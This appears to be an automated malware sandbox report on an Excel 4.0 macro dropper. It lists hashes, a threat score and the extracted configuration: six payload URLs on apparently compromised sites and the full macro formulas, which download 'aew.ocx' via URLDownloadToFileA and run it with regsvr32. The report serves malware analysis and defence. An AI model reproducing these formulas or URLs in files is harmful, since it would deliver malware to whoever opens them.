General

  • Target

    26ff5dcbf0911ce523e666dd5974dba67a08189704451097127f7298c3723c95

  • Size

    44KB

  • Sample

    240909-1pdt5asaqm

  • MD5

    198cc15bec1abaa15f45f1d4e497ddf2

  • SHA1

    931d0c6794ea4d195606086d871a329eecc0d840

  • SHA256

    26ff5dcbf0911ce523e666dd5974dba67a08189704451097127f7298c3723c95

  • SHA512

    d320ef279494c1a91ca0abc3cc5e89c13d32d1a8d9269803e643edd169fd70f31c90771ceb24234776bca4de0362b7f6e3e45b36612bd2cd336e1c4c4c2e2ec4

  • SSDEEP

    768:UCQvLUWK9y2fdc/buIgsqlkVw2WFc8SGnCu2JBgBkXrI34gIKJCBEdMlO2vJGx:BQv4Y2sb6yVwpFB1CuEge7tgIKJNyM

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://dan-bau.com/wp-includes/css/dist/h2plh7xZso/

https://advisereviews.com/wp-content/2NyZZiJ6KEzPPrbx/

https://aplicativos.xyz/apk/49Wq5MN/

http://www.equus.com/2i8yt/0kWhkppl8oTFCeYu9gS/

http://prevozkop.rs/qnov/n017r0EEa/

https://businessandhr.com/w/xrB/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://dan-bau.com/wp-includes/css/dist/h2plh7xZso/","..\aew.ocx",0,0)
    =IF('EFALGV'!D10<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://advisereviews.com/wp-content/2NyZZiJ6KEzPPrbx/","..\aew.ocx",0,0))
    =IF('EFALGV'!D12<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://aplicativos.xyz/apk/49Wq5MN/","..\aew.ocx",0,0))
    =IF('EFALGV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.equus.com/2i8yt/0kWhkppl8oTFCeYu9gS/","..\aew.ocx",0,0))
    =IF('EFALGV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://prevozkop.rs/qnov/n017r0EEa/","..\aew.ocx",0,0))
    =IF('EFALGV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://businessandhr.com/w/xrB/","..\aew.ocx",0,0))
    =IF('EFALGV'!D20<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\aew.ocx")
    =RETURN()

Targets

    • Target

      26ff5dcbf0911ce523e666dd5974dba67a08189704451097127f7298c3723c95


    Score
    3/10

MITRE ATT&CK Enterprise v15

Tasks